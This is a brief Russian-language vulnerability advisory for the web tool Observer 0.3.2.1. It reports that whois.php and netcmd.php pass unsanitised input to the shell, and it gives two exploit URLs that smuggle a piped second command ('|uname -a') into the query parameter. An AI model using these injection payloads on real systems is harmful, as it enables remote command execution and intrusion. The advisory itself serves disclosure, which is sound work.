Программа: Observer 0.3.2.1

Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных сценариями whois.php и netcmd.php. Удаленный пользователь может выполнить
произвольные команды на целевой системе.

Эксплоит:

http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a



Оставить мнение